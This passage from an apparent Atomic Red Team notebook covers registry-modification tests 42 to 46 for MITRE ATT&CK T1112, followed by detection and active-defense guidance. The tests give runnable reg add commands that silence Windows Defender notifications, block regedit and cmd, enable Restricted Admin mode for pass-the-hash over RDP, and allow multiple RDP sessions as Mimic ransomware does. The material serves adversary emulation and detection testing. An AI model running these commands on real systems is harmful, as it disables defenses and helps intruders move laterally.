encounter in specific application or process.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 42

### Atomic Test #43 - DisallowRun Execution Of Certain Applications
Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
using security product.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 43

### Atomic Test #44 - Enabling Restricted Admin Mode via Command_Prompt
Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP.

See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 44

### Atomic Test #45 - Mimic Ransomware - Enable Multiple User Sessions
This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. 
See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 45

### Atomic Test #46 - Mimic Ransomware - Allow Multiple RDP Sessions per User
This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. 
See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 46

## Detection
Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.

Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.

Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).

## Shield Active Defense
### Baseline 
 Identify key system elements to establish a baseline and be prepared to reset a system to that baseline when necessary. 

 Identify elements of software and configuration critical to a set of objectives, define their proper values, and be prepared to reset a running system to its intended state.  
#### Opportunity
There is an opportunity to utilize known good copies of registry information and restore it if an adversary makes any changes.
#### Use Case
A defender can enable Registry Auditing on specific keys to produce an alerts whenever a value is changed and revert those keys to baseline.
#### Procedures
Maintain a verified baseline firewall configuration and use that copy as a fallback if an adversary alters that information.
Maintain a verified list of group policies enforced on a system and use that copy if an adversary attempts to deviate from the baseline.